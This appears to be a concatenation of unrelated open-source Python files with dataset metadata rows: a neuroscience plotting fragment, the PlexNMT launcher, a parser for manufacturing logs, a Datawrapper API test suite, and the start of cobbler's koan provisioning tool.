state_grid[i,j,0] = np.mean(signal[999,0])
state_grid[i,j,1] = np.mean(signal[4000:,0])
state_grid[i,j,2] = np.max(signal[900:,0])
print "len: %.0f | int: %.0f | he: %.2fmV | hi: %2.fmV" %(le, ins, he*1000,hi*1000)
j+=1
i+=1
#dataa=length_range,intensity_range,state_grid
np.save('RUM_Dec_meas_full2_le500t1500i10msInt50t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),state_grid)
#np.save('RUM_Dec_sim_le500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),signal)
#np.save('RUM_Dec_data_le500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),dataa)
#
#
#def cleargrid(state_grid):
# [x,y,z]=np.shape(state_grid)
# for i in range(x):
# for j in range(y):
# if state_grid[i,j,1] > 0.004:
# state_grid[i,j,1] = 0.006
# elif state_grid[i,j,1] < 0.004:
# state_grid[i,j,1] = -0.002
# else:
# raise ValueError('Error')
# print "ERROR"
#
# return state_grid
###
#%% Analysis
#import matplotlib.pyplot as plt
#hirange = np.arange(19,26,1)*1e-3
#herange = np.arange(2.5,4.1,0.25)*1e-3
#
#
#glob_low_val=1e3
#glob_high_val=-1e3
#
#for he in herange:
# for hi in hirange:
# a=np.load('RUM_Detector2_Imple500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000))
#
#
# length_range=a[0]
# intensity_range=a[1]
# state_grid=a[2]
#
# low_lenge=np.min(length_range)
# high_lenge=np.max(length_range)
# low_inte=np.min(intensity_range)
# high_inte=np.max(intensity_range)
#
# if np.min(state_grid[:,:,1]) < glob_low_val:
# glob_low_val=np.min(state_grid[:,:,1])
# print he,hi,glob_low_val
# if np.max(state_grid[:,:,1]) > glob_high_val:
# glob_high_val=np.max(state_grid[:,:,1])
# print he,hi,glob_high_val,1
#
# plt.figure(2)
# plt.clf()
# state_grid=cleargrid(state_grid)
# plt.imshow(np.flipud(state_grid[:,:,1]), aspect='auto', extent = (low_lenge,high_lenge,low_inte,high_inte),interpolation='none')
# plt.ylabel('intensity')
# plt.xlabel('length')
# plt.title('Detektor Diagram,he:%.0fms, hi:%.0fpps' %(he*1000,hi*1000))
# cb=plt.colorbar()
# plt.savefig('RUM_Detektor2_Imple500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.pdf' %(he*1000,hi*1000), format='pdf', dpi=1000)
# plt.close()
# #
#
# # baselevel plot hier zwecklos, da baselevel bei allen stimuli gleich
# plt.figure(2)
# plt.clf()
# #state_grid=cleargrid(state_grid)
# plt.clf()
# plt.imshow(np.flipud(state_grid[:,:,0]), aspect='auto', extent = (low_lenge,high_lenge,low_inte,high_inte),interpolation='none')
# plt.ylabel('intensity')
# plt.xlabel('length')
# plt.title('Detektor Diagram,Baselevels,he:%.0fmV, hi:%.0fmV' %(he*1000,hi*1000))
# plt.colorbar()
# #plt.savefig('RUM_Detektor_Baselevel_Imple%.0fmsInt%.0f_He2.5t7.0i0k05_Hi10t25i0k1_1.pdf' %(lenge,inte), format='pdf', dpi=1000)
#
# plt.close('all')
|
gpl-3.0
| 4,919,975,346,268,894,000 | 29.979058 | 137 | 0.540984 | false |
junkcollector/PlexNMT-100
|
PlexNMT.py
|
1
|
3652
|
#!/usr/bin/env python
"""
PlexNMT
Sources:
PlexConnect: https://github.com/iBaa/PlexConnect/wiki
inter-process-communication (queue): http://pymotw.com/2/multiprocessing/communication.html
"""
import sys, time
from os import sep
import socket
from multiprocessing import Process, Pipe
import signal, errno
from Version import __VERSION__
import WebServer
import Settings
from Debug import * # dprint()
def getIP_self():
cfg = param['CSettings']
if cfg.getSetting('enable_plexnmt_autodetect')=='True':
# get public ip of machine running PlexNMT
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('1.2.3.4', 1000))
IP = s.getsockname()[0]
dprint('PlexNMT', 0, "IP_self: "+IP)
else:
# manual override from "settings.cfg"
IP = cfg.getSetting('ip_plexnmt')
dprint('PlexNMT', 0, "IP_self (from settings): "+IP)
return IP
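# Note on the auto-detect branch above: connect() on a datagram (UDP) socket
# sends no traffic; it only asks the kernel to pick a route, so getsockname()
# returns the local address that would be used to reach the target. Minimal
# standalone sketch of the same idea (the target is a TEST-NET address):
#
#   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   s.connect(('192.0.2.1', 1000))  # no packet is actually sent
#   print(s.getsockname()[0])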
procs = {}
pipes = {}
param = {}
running = False
def startup():
global procs
global pipes
global param
global running
# Settings
cfg = Settings.CSettings()
param['CSettings'] = cfg
# Logfile
if cfg.getSetting('logpath').startswith('.'):
# relative to current path
logpath = sys.path[0] + sep + cfg.getSetting('logpath')
else:
# absolute path
logpath = cfg.getSetting('logpath')
param['LogFile'] = logpath + sep + 'PlexNMT.log'
param['LogLevel'] = cfg.getSetting('loglevel')
dinit('PlexNMT', param, True) # init logging, new file, main process
dprint('PlexNMT', 0, "Version: {0}", __VERSION__)
dprint('PlexNMT', 0, "Python: {0}", sys.version)
dprint('PlexNMT', 0, "Host OS: {0}", sys.platform)
# more Settings
param['IP_self'] = getIP_self()
# param['HostToIntercept'] = cfg.getSetting('hosttointercept')
# param['baseURL'] = 'http://'+ param['HostToIntercept']
running = True
# init WebServer
if running:
master, slave = Pipe() # endpoint [0]-PlexNMT, [1]-WebServer
proc = Process(target=WebServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer'] = proc
pipes['WebServer'] = master
else:
dprint('PlexNMT', 0, "WebServer not alive. Shutting down.")
running = False
# not started successful - clean up
if not running:
cmdShutdown()
shutdown()
return running
def run():
while running:
# do something important
try:
time.sleep(60)
except IOError as e:
if e.errno == errno.EINTR and not running:
pass # mask "IOError: [Errno 4] Interrupted function call"
else:
raise
def shutdown():
for slave in procs:
procs[slave].join()
dprint('PlexNMT', 0, "shutdown")
def cmdShutdown():
global running
running = False
# send shutdown to all pipes
for slave in pipes:
pipes[slave].send('shutdown')
dprint('PlexNMT', 0, "Shutting down.")
def sighandler_shutdown(signum, frame):
signal.signal(signal.SIGINT, signal.SIG_IGN) # we heard you!
cmdShutdown()
if __name__=="__main__":
signal.signal(signal.SIGINT, sighandler_shutdown)
signal.signal(signal.SIGTERM, sighandler_shutdown)
dprint('PlexNMT', 0, "***")
dprint('PlexNMT', 0, "PlexNMT")
dprint('PlexNMT', 0, "Press CTRL-C to shut down.")
dprint('PlexNMT', 0, "***")
success = startup()
if success:
run()
shutdown()
|
mit
| -6,980,175,735,864,880,000 | 23.843537 | 91 | 0.592278 | false |
annelisebouyer/datawrapper
|
test/api.test.py
|
1
|
4387
|
#
# test script for Datawrapper API
#
import requests
import os
import json
from random import randint
import yaml
config = yaml.load(open('../config.yaml').read())
domain = 'http://' + config['domain']
if 'DATAWRAPPER_DOMAIN' in os.environ:
domain = os.environ['DATAWRAPPER_DOMAIN']
endpoint = domain + '/api/'
import unittest
print 'testing on ' + domain
ns = {
'chartId': None,
'session': requests.Session()
}
# create new chart
class TestDatawrapperAPI(unittest.TestCase):
def checkRes(self, r):
self.assertIsInstance(r.json(), dict)
self.assertEqual(r.json()['status'], 'ok')
if r.json()['status'] == 'error':
print r.json()['message']
def test_01_create_new_chart(self):
global ns
r = ns['session'].post(endpoint + 'charts')
self.checkRes(r)
ns['chartId'] = r.json()['data'][0]['id']
def test_02_set_chart_data(self):
data = 'some,data,to,send\nanother,row,to,send\n'
url = endpoint + 'charts/%s/data' % ns['chartId']
r = ns['session'].put(url, data=data)
self.checkRes(r)
# check that data was set correctly
r = ns['session'].get(url)
self.assertEqual(r.text, data)
def test_03_upload_chart_data(self):
files = {'qqfile': (
'report.csv', 'other,data,to,send\nanother,row,to,send\n')}
url = endpoint + 'charts/%s/data' % ns['chartId']
r = ns['session'].post(url, files=files)
self.checkRes(r)
# check that data was set correctly
r = ns['session'].get(url)
self.assertEqual(r.text, files['qqfile'][1])
def test_04_get_chart_meta(self):
url = endpoint + 'charts/%s' % ns['chartId']
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(r.json()['data']['showInGallery'], False)
def test_05_saveMetadata(self):
url = endpoint + 'charts/%s' % ns['chartId']
r = ns['session'].get(url)
self.checkRes(r)
data = r.json()['data']
data['title'] = 'My cool new chart'
data['metadata']['describe']['source-name'] = 'Example Data Source'
data['metadata']['describe']['source-url'] = 'http://example.org'
r = ns['session'].put(url, data=json.dumps(data))
self.checkRes(r)
# self.assertEqual(r.json()['data']['showInGallery'], False)
def test_06_gallery(self):
url = endpoint + 'gallery'
r = ns['session'].get(url)
self.checkRes(r)
def test_06_visualizations(self):
url = endpoint + 'visualizations'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIsInstance(r.json()['data'], list)
def test_07_bar_chart(self):
url = endpoint + 'visualizations/bar-chart'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIsInstance(r.json()['data'], dict)
def test_08_account(self):
url = endpoint + 'account'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIn('user', r.json()['data'])
self.assertIsInstance(r.json()['data']['user'], dict)
def test_09_set_lang_to_fr(self):
url = endpoint + 'account/lang'
r = ns['session'].put(url, data=json.dumps(dict(lang='fr')))
self.checkRes(r)
def test_10_check_lang_is_fr(self):
url = endpoint + 'account/lang'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(r.json()['data'], 'fr')
def test_11_charts(self):
url = endpoint + 'charts'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(len(r.json()['data']), 1)
def test_11a_charts_sorted(self):
url = endpoint + 'charts?order=theme'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(len(r.json()['data']), 1)
def test_12_estimate_job(self):
url = endpoint + 'jobs/export/estimate'
r = ns['session'].get(url)
self.checkRes(r)
def test_13_create_user(self):
url = endpoint + '/users'
password = '1234'
body = dict(pwd=password, pwd2=password,
email=('test-%d@' + config['domain']) % randint(10000, 99999))
r = ns['session'].post(url, data=json.dumps(body))
self.checkRes(r)
if __name__ == '__main__':
unittest.main()
|
mit
| 4,377,913,288,608,271,000 | 29.678322 | 82 | 0.569182 | false |
cfangmeier/UNL-Gantry-Encapsulation-Monitoring
|
Logs2JSON.py
|
1
|
10923
|
#!/usr/bin/env python3
import io
import re
import json
import pydoc
import zipfile
import traceback
import argparse
import collections
from datetime import datetime
import urllib.request as request
from itertools import count
Vec3d = collections.namedtuple('Vec3d', 'x,y,z')
Orient3d = collections.namedtuple('Orient3d', 'x,y,z,q')
def parse_potting_datetime(pot_log_line):
dt_str = pot_log_line.split('>>>')[0].strip()
return datetime.strptime(dt_str, '%d/%m/%Y %I:%M:%S %p')
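# Worked example for the format above (hypothetical log line):
#   "22/06/2015 05:13:42 PM >>> dispensing started"
# parses to datetime(2015, 6, 22, 17, 13, 42).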
def parse_gluing_datetime(glue_log_line, just_date=False):
colon_pos = glue_log_line.find(':')
dt_str = glue_log_line[colon_pos+1:].strip()
if just_date:
return datetime.strptime(dt_str, '%m/%d/%Y')
else:
return datetime.strptime(dt_str, '%d/%m/%Y-%H:%M:%S')
def datetime2str(dt, just_date=False):
if just_date:
return dt.strftime('%d/%m/%Y')
else:
return dt.strftime('%d/%m/%Y-%H:%M:%S')
def hdi2moduleid(hdi_id):
try:
url_base = ("http://inky.physics.purdue.edu/cmsfpix/"
"/Submission_p/summary/hdi.php?name={}")
response = request.urlopen(url_base.format(hdi_id))
data = response.read().decode('utf8')
return re.findall('M-.-.-..?', data)[0]
except IndexError:
return None
def page(s):
pydoc.pager(str(s))
def load_gluing_logs(zipfile_name):
zf = zipfile.ZipFile(zipfile_name)
logs = collections.OrderedDict()
fnames = [z.filename for z in zf.filelist]
for fname in sorted(fnames):
with zf.open(fname) as f:
log = f.read().decode('utf8').split('\n')
logs[fname] = (fname, log)
return list(logs.values())
def parse_gluing_log(log):
def value(line):
return line.split(':')[1].strip()
date = parse_gluing_datetime(log[4], just_date=True)
date = datetime2str(date, just_date=True)
start_time = parse_gluing_datetime(log[5])
start_time = datetime2str(start_time)
finish_time = parse_gluing_datetime(log[10])
finish_time = datetime2str(finish_time)
operator = value(log[6])
software_version = value(log[7])
pressure = value(log[11])
araldite_batch = value(log[12])
chuck = value(log[18])
lines = [l.strip() for l in log[22:30]]
modules = {}
for i, (bbm_id, hdi_id) in enumerate(zip(lines[:-1:2], lines[1::2])):
if bbm_id in {'glass', '---'} or hdi_id in {'kapton', '---'}:
continue
mod_id = hdi2moduleid(hdi_id)
module = {'module_id': mod_id,
'hdi_id': hdi_id,
'bbm_id': bbm_id,
'date': date,
'start_time': start_time,
'finish_time': finish_time,
'operator': operator,
'software_version': software_version,
'pressure': pressure,
'araldite_batch': araldite_batch,
'chuck': chuck,
'slot': i+1,
}
modules[mod_id] = module
return modules
def load_potting_logs(full_zipfile_name):
fullzf = zipfile.ZipFile(full_zipfile_name)
fname_re = re.compile('Config-(.*).zip')
logs = collections.OrderedDict()
zip_fnames = [z.filename for z in fullzf.filelist]
for zip_fname in sorted(zip_fnames):
short_fname = fname_re.findall(zip_fname)[0]
# Extract inner zipfile
with fullzf.open(zip_fname) as f:
b = io.BytesIO(f.read())
# Open extracted zipfile and read Potting.log into memory
zf = zipfile.ZipFile(b)
with zf.open("Potting.log") as f:
log = f.read().decode('utf8').split('\n')
logs[short_fname] = (short_fname, log)
return list(logs.values())
def parse_potting_log(log):
time_start = parse_potting_datetime(log[0])
for i in count(1): # Read from end of file looking for last timestamp
try:
time_finish = parse_potting_datetime(log[-i])
break
except ValueError:
continue
time_taken = (time_finish - time_start).seconds // 60
def split_sections(log):
sec_re = re.compile(('(Configure Tester|Inspect Fiducials|'
'Review Fiducials|Inspect Modules|'
'Review Modules|Load Sylgard|'
'Align Needle|Purge|Pot|Finish) '
'has been executed successfully'))
sections = {}
sec_curr_lines = []
for line in log:
res = sec_re.findall(line)
if not res:
sec_curr_lines.append(line)
else:
sections[res[0]] = sec_curr_lines
sec_curr_lines = []
return sections
def parse_tablestate(lines):
modules = {}
reg = re.compile("Chuck: (\d+), Slot: (\d+), S/N: (.*), State: (.*)$")
for line in lines:
res = reg.findall(line.strip())
if not res:
continue
res = res[0]
if res[3] != "Empty":
chuck = res[0]
slot = res[1]
id_ = res[2]
ts = datetime2str(time_start)
tf = datetime2str(time_finish)
pd = datetime2str(time_start, just_date=True)
modules[(chuck, slot)] = {'module_id': id_,
'chuck': chuck,
'slot': slot,
'HDI_fids': {},
'BBM_fids': {},
'pot_lines': {},
'time_start': ts,
'time_end': tf,
'time_taken': time_taken,
'date': pd}
return modules
def parse_alignment(lines, modules):
reg_fid = re.compile(('Chuck (\d+) Slot (\d+): , '
'(BBM|HDI) Fiducial (.*): Source: (.*), '
'Image Position: ([\d.]*),([\d.]*),([\d.]*), '
'Image Coor?dinate: ([\d.]*),([\d.]*),([\d.]*), '
'Fiducial Position: ([\d.]*),([\d.]*),([\d.]*)'))
reg_mod = re.compile(('Chuck (\d+) Slot (\d+): , (BBM|HDI) '
'Center:([\d.]*),([\d.]*),([\d.]*) '
'Orientation:([\d.-]*),([\d.-]*),'
'([\d.-]*),([\d.-]*) '
'Rotation:([\d.-]*) degrees'))
for line in lines:
res_fid = reg_fid.findall(line)
if res_fid:
res = res_fid[0]
mod = modules[(res[0], res[1])]
fid = {'name': res[3],
'source': res[4],
'img_pos': Vec3d(*res[5:8]),
'img_crd': Vec3d(*res[8:11]),
'fid_pos': Vec3d(*res[11:14])}
mod[res[2]+'_fids'][res[3]] = fid
res_mod = reg_mod.findall(line)
if res_mod:
res = res_mod[0]
mod = modules[(res[0], res[1])]
mod[res[2]+'_center'] = Vec3d(*res[3:6])
mod[res[2]+'_orient'] = Orient3d(*res[6:10])
mod[res[2]+'_rotatn'] = res[10]
def parse_potting_lines(lines, modules):
reg = re.compile(('Chuck (\d+) Slot (\d+): : (.*), '
'Global: ([\d.-]*),([\d.-]*),([\d.-]*)->'
'([\d.-]*),([\d.-]*),([\d.-]*), '
'Local: ([\d.-]*),([\d.-]*),([\d.-]*)->'
'([\d.-]*),([\d.-]*),([\d.-]*), '
'(Enabled|Disabled)'))
for line in lines:
res = reg.findall(line)
if res:
res = res[0]
mod = modules[(res[0], res[1])]
line = {'global': {'start': Vec3d(*res[3:6]),
'end': Vec3d(*res[6:9])},
'local': {'start': Vec3d(*res[9:12]),
'end': Vec3d(*res[12:15])},
'state': res[15]}
mod['pot_lines'][res[2]] = line
def parse_finish(lines, modules):
reg = re.compile('(Operator Name|Sylgard Batch|Pressure):(.*$)')
for line in lines:
res = reg.findall(line)
if res:
res = res[0]
for module in modules.values():
key = res[0].lower().replace(" ", "_")
module[key] = res[1].strip()
secs = split_sections(log)
modules = parse_tablestate(secs['Configure Tester'])
parse_alignment(secs['Review Fiducials'], modules)
parse_potting_lines(secs['Pot'], modules)
parse_finish(secs['Finish'], modules)
time = (time_finish-time_start).seconds // 60
return list(modules.values()), time
def process_potting_logs(full_zipfile_name):
logs = load_potting_logs(full_zipfile_name)
modules = []
for filename, log in logs:
try:
mods, time = parse_potting_log(log)
time //= len(mods)
for mod in mods:
mod['time'] = time
mod['source_file'] = filename
print("parsed {} modules from {}".format(len(mods), filename))
modules += mods
except KeyError as e:
print("file: {} Has invalid format, skipping...".format(filename))
traceback.print_exc()
print(e)
return modules
def process_gluing_logs(zipfile_name):
logs = load_gluing_logs(zipfile_name)
modules = {}
for log_file, log in logs[-5:]:
modules.update(parse_gluing_log(log))
return modules.values()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=('Convert manufacturing '
'log files to json'))
arg = parser.add_argument
arg('--pottinglog', help='Zipfile containing Potting log files')
arg('--gluinglog', help='Zipfile containing Gluing log files')
args = parser.parse_args()
pot_logs = {}
glue_logs = {}
if args.pottinglog is not None:
pot_logs = process_potting_logs(args.pottinglog)
if args.gluinglog is not None:
glue_logs = process_gluing_logs(args.gluinglog)
logs = collections.defaultdict(dict)
for log in pot_logs:
mod_id = log.pop('module_id').upper()
logs[mod_id]['potting'] = log
for log in glue_logs:
if log['module_id'] is None:
continue
mod_id = log.pop('module_id').upper()
logs[mod_id]['gluing'] = log
enc = json.JSONEncoder(indent=' ')
with open('Potting_Logs.json', 'w') as f:
f.write(enc.encode(logs))
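# Hedged invocation sketch (archive names are hypothetical):
#   python Logs2JSON.py --pottinglog Potting_Configs.zip --gluinglog Gluing_Logs.zip
# The per-module records, keyed by module ID with 'potting' and 'gluing'
# sub-dicts, are written to Potting_Logs.json in the current directory.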
|
mit
| 165,149,412,829,744,670 | 35.654362 | 79 | 0.483017 | false |
philgyford/django-spectator
|
spectator/events/migrations/0042_auto_20200407_1039.py
|
1
|
1302
|
# Generated by Django 3.0.5 on 2020-04-07 10:39
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("spectator_events", "0041_event_ticket"),
]
operations = [
migrations.AlterField(
model_name="venue",
name="cinema_treasures_id",
field=models.PositiveIntegerField(
blank=True,
help_text='Optional. ID of a cinema at\n<a href="http://cinematreasures.org/">Cinema Treasures</a>.', # noqa: E501
null=True,
),
),
migrations.AlterField(
model_name="work",
name="imdb_id",
field=models.CharField(
blank=True,
help_text="Starts with 'tt', e.g. 'tt0100842'.\nFrom <a href=\"https://www.imdb.com\">IMDb</a>.", # noqa: E501
max_length=12,
validators=[
django.core.validators.RegexValidator(
code="invalid_imdb_id",
message='IMDb ID should be like "tt1234567"',
regex="^tt\\d{7,10}$",
)
],
verbose_name="IMDb ID",
),
),
]
|
mit
| -8,364,434,065,121,548,000 | 31.55 | 131 | 0.490015 | false |
spotify/cobbler
|
koan/app.py
|
1
|
71889
|
"""
koan = kickstart over a network
a tool for network provisioning of virtualization (xen,kvm/qemu,vmware)
and network re-provisioning of existing Linux systems.
used with 'cobbler'. see manpage for usage.
Copyright 2006-2008 Red Hat, Inc and Others.
Michael DeHaan <michael.dehaan AT gmail>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
import random
import os
import traceback
import tempfile
import shlex
ANCIENT_PYTHON = 0
try:
try:
from optparse import OptionParser
except:
from opt_parse import OptionParser # importing this for backwards compat with 2.2
try:
import subprocess as sub_process
except:
import sub_process
except:
# the main "replace-self" codepath of koan must support
# Python 1.5. Other sections may use 2.3 features (nothing newer)
# provided they are conditionally imported. This is to support
# EL 2.1. -- mpd
ANCIENT_PYTHON = 1
True = 1
False = 0
import exceptions
import time
import shutil
import errno
import re
import sys
import xmlrpclib
import string
import glob
import socket
import utils
import time
import configurator
COBBLER_REQUIRED = 1.300
"""
koan --virt [--profile=webserver|--system=name] --server=hostname
koan --replace-self --profile=foo --server=hostname [--kexec]
"""
DISPLAY_PARAMS = [
"name",
"distro","profile",
"kickstart","ks_meta",
"install_tree","kernel","initrd",
"netboot_enabled",
"kernel_options",
"repos",
"virt_ram",
"virt_disk",
"virt_disk_driver",
"virt_type",
"virt_path",
"virt_auto_boot",
]
def main():
"""
Command line stuff...
"""
try:
utils.setupLogging("koan")
except:
# most likely running RHEL3, where we don't need virt logging anyway
pass
if ANCIENT_PYTHON:
print "- command line usage on this version of python is unsupported"
print "- usage via spacewalk APIs only. Python x>=2.3 required"
return
p = OptionParser()
p.add_option("-k", "--kopts",
dest="kopts_override",
help="append additional kernel options")
p.add_option("-l", "--list",
dest="list_items",
help="lists remote items (EX: profiles, systems, or images)")
p.add_option("-v", "--virt",
dest="is_virt",
action="store_true",
help="install new virtual guest")
p.add_option("-u", "--update-files",
dest="is_update_files",
action="store_true",
help="update templated files from cobbler config management")
p.add_option("-c", "--update-config",
dest="is_update_config",
action="store_true",
help="update system configuration from cobbler config management")
p.add_option("", "--summary",
dest="summary",
action="store_true",
help="print configuration run stats")
p.add_option("-V", "--virt-name",
dest="virt_name",
help="use this name for the virtual guest")
p.add_option("-r", "--replace-self",
dest="is_replace",
action="store_true",
help="reinstall this host at next reboot")
p.add_option("-D", "--display",
dest="is_display",
action="store_true",
help="display the configuration stored in cobbler for the given object")
p.add_option("-p", "--profile",
dest="profile",
help="use this cobbler profile")
p.add_option("-y", "--system",
dest="system",
help="use this cobbler system")
p.add_option("-i", "--image",
dest="image",
help="use this cobbler image")
p.add_option("-s", "--server",
dest="server",
default=os.environ.get("COBBLER_SERVER",""),
help="attach to this cobbler server")
p.add_option("-S", "--static-interface",
dest="static_interface",
help="use static network configuration from this interface while installing")
p.add_option("-t", "--port",
dest="port",
help="cobbler port (default 80)")
p.add_option("-w", "--vm-poll",
dest="should_poll",
action="store_true",
help="for xen/qemu/KVM, poll & restart the VM after the install is done")
p.add_option("-P", "--virt-path",
dest="virt_path",
help="override virt install location")
p.add_option("", "--force-path",
dest="force_path",
action="store_true",
help="Force overwrite of virt install location")
p.add_option("-T", "--virt-type",
dest="virt_type",
help="override virt install type")
p.add_option("-B", "--virt-bridge",
dest="virt_bridge",
help="override virt bridge")
p.add_option("-n", "--nogfx",
action="store_true",
dest="no_gfx",
help="disable Xen graphics (xenpv,xenfv)")
p.add_option("", "--virt-auto-boot",
action="store_true",
dest="virt_auto_boot",
help="set VM for autoboot")
p.add_option("", "--add-reinstall-entry",
dest="add_reinstall_entry",
action="store_true",
help="when used with --replace-self, just add entry to grub, do not make it the default")
p.add_option("-C", "--livecd",
dest="live_cd",
action="store_true",
help="used by the custom livecd only, not for humans")
p.add_option("", "--kexec",
dest="use_kexec",
action="store_true",
help="Instead of writing a new bootloader config when using --replace-self, just kexec the new kernel and initrd")
p.add_option("", "--no-copy-default",
dest="no_copy_default",
action="store_true",
help="Do not copy the kernel args from the default kernel entry when using --replace-self")
p.add_option("", "--embed",
dest="embed_kickstart",
action="store_true",
help="When used with --replace-self, embed the kickstart in the initrd to overcome potential DHCP timeout issues. (seldom needed)")
p.add_option("", "--qemu-disk-type",
dest="qemu_disk_type",
help="when used with --virt_type=qemu, add select of disk driver types: ide,scsi,virtio")
p.add_option("", "--qemu-net-type",
dest="qemu_net_type",
help="when used with --virt_type=qemu, select type of network device to use: e1000, ne2k_pci, pcnet, rtl8139, virtio")
p.add_option("", "--qemu-machine-type",
dest="qemu_machine_type",
help="when used with --virt_type=qemu, select type of machine type to emulate: pc, pc-1.0, pc-0.15")
(options, args) = p.parse_args()
try:
k = Koan()
k.list_items = options.list_items
k.server = options.server
k.is_virt = options.is_virt
k.is_update_files = options.is_update_files
k.is_update_config = options.is_update_config
k.summary = options.summary
k.is_replace = options.is_replace
k.is_display = options.is_display
k.profile = options.profile
k.system = options.system
k.image = options.image
k.live_cd = options.live_cd
k.virt_path = options.virt_path
k.force_path = options.force_path
k.virt_type = options.virt_type
k.virt_bridge = options.virt_bridge
k.no_gfx = options.no_gfx
k.add_reinstall_entry = options.add_reinstall_entry
k.kopts_override = options.kopts_override
k.static_interface = options.static_interface
k.use_kexec = options.use_kexec
k.no_copy_default = options.no_copy_default
k.should_poll = options.should_poll
k.embed_kickstart = options.embed_kickstart
k.virt_auto_boot = options.virt_auto_boot
k.qemu_disk_type = options.qemu_disk_type
k.qemu_net_type = options.qemu_net_type
k.qemu_machine_type = options.qemu_machine_type
if options.virt_name is not None:
k.virt_name = options.virt_name
if options.port is not None:
k.port = options.port
k.run()
except Exception, e:
(xa, xb, tb) = sys.exc_info()
try:
getattr(e,"from_koan")
print str(e)[1:-1] # nice exception, no traceback needed
except:
print xa
print xb
print string.join(traceback.format_list(traceback.extract_tb(tb)))
return 1
return 0
#=======================================================
class InfoException(exceptions.Exception):
"""
Custom exception for tracking of fatal errors.
"""
def __init__(self,value,**args):
self.value = value % args
self.from_koan = 1
def __str__(self):
return repr(self.value)
#=======================================================
class Koan:
def __init__(self):
"""
Constructor. Arguments will be filled in by optparse...
"""
self.server = None
self.system = None
self.profile = None
self.list_profiles = None
self.list_systems = None
self.is_virt = None
self.is_update_files = None
self.is_update_config = None
self.summary = None
self.is_replace = None
self.port = None
self.static_interface = None
self.virt_name = None
self.virt_type = None
self.virt_path = None
self.force_path = None
self.qemu_disk_type = None
self.qemu_net_type = None
self.qemu_machine_type = None
self.virt_auto_boot = None
        # When this option is NOT set, koan passes --copy-default to
        # /sbin/grubby, which uses the default boot entry in grub.conf
        # as the template for the new entry being added to that file.
        # See /sbin/grubby --help for more info.
self.no_copy_default = None
#---------------------------------------------------
def run(self):
"""
koan's main function...
"""
# we can get the info we need from either the cobbler server
# or a kickstart file
if self.server is None:
raise InfoException, "no server specified"
# check to see that exclusive arguments weren't used together
found = 0
for x in (self.is_virt, self.is_replace, self.is_update_files, self.is_display, self.list_items, self.is_update_config):
if x:
found = found+1
if found != 1:
raise InfoException, "choose: --virt, --replace-self, --update-files, --list=what, or --display"
# This set of options are only valid with --server
if not self.server or self.server == "":
if self.list_items or self.profile or self.system or self.port:
raise InfoException, "--server is required"
self.xmlrpc_server = utils.connect_to_server(server=self.server, port=self.port)
if self.list_items:
self.list(self.list_items)
return
if not os.getuid() == 0:
if self.is_virt:
print "warning: running as non root"
else:
print "this operation requires root access"
return 3
# if both --profile and --system were ommitted, autodiscover
if self.is_virt:
if (self.profile is None and self.system is None and self.image is None):
raise InfoException, "must specify --profile, --system, or --image"
else:
if (self.profile is None and self.system is None and self.image is None):
self.system = self.autodetect_system(allow_interactive=self.live_cd)
if self.system is None:
while self.profile is None:
self.profile = self.ask_profile()
# if --virt-type was specified and invalid, then fail
if self.virt_type is not None:
self.virt_type = self.virt_type.lower()
if self.virt_type not in [ "qemu", "xenpv", "xenfv", "xen", "vmware", "vmwarew", "auto", "kvm" ]:
if self.virt_type == "xen":
self.virt_type = "xenpv"
raise InfoException, "--virt-type should be qemu, xenpv, xenfv, vmware, vmwarew, kvm, or auto"
# if --qemu-disk-type was called without --virt-type=qemu, then fail
if (self.qemu_disk_type is not None):
self.qemu_disk_type = self.qemu_disk_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-disk-type must use with --virt-type=qemu"
# if --qemu-net-type was called without --virt-type=qemu, then fail
if (self.qemu_net_type is not None):
self.qemu_net_type = self.qemu_net_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-net-type must use with --virt-type=qemu"
# if --qemu-machine-type was called without --virt-type=qemu, then fail
if (self.qemu_machine_type is not None):
self.qemu_machine_type = self.qemu_machine_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-machine-type must use with --virt-type=qemu"
# if --static-interface and --profile was called together, then fail
if self.static_interface is not None and self.profile is not None:
            raise InfoException, "--static-interface option is incompatible with the --profile option; use --system instead"
# perform one of three key operations
if self.is_virt:
self.virt()
elif self.is_replace:
if self.use_kexec:
self.kexec_replace()
else:
self.replace()
elif self.is_update_files:
self.update_files()
elif self.is_update_config:
self.update_config()
else:
self.display()
# --------------------------------------------------
def ask_profile(self):
"""
        Used by the live CD mode. If the system cannot be auto-discovered, show
        a list of available profiles and ask the user which one to install.
"""
# FIXME: use a TUI library to make this more presentable.
try:
available_profiles = self.xmlrpc_server.get_profiles()
except:
traceback.print_exc()
self.connect_fail()
print "\n- which profile to install?\n"
for x in available_profiles:
print "%s" % x["name"]
sys.stdout.write("\n?>")
data = sys.stdin.readline().strip()
for x in available_profiles:
print "comp (%s,%s)" % (x["name"],data)
if x["name"] == data:
return data
